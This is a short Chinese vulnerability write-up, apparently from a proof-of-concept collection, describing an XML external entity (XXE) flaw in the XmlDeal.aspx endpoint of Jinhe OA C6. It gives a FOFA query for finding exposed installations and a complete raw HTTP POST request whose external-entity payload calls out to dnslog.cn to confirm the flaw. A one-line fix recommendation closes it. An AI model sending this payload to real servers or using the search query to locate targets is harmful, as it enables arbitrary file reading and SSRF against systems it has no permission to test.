J1-21金和-OA-XXE
漏洞描述:
金和OA C6 XmlDeal.aspx 接口处存在XML实体注入漏洞,攻击者可利用xxe漏洞获取服务器敏感数据,可读取任意文件以及ssrf攻击,存在一定的安全隐患。
影响版本:
- 金和 OA
网站图片:
网络测绘:
fofa语法:
FOFA:app=“金和网络-金和OA”
漏洞复现:
payload:
POST /c6/JHSoft.Web.Message/XmlDeal.aspx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/Xml
<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://dnslog.cn"> %remote;]>
效果图:
Dnslog验证
修复建议:
禁用金和OA C6的XmlDeal.aspx
接口中的XML外部实体解析,以修复XXE漏洞并保护服务器不受敏感数据泄露和SSRF攻击的风险。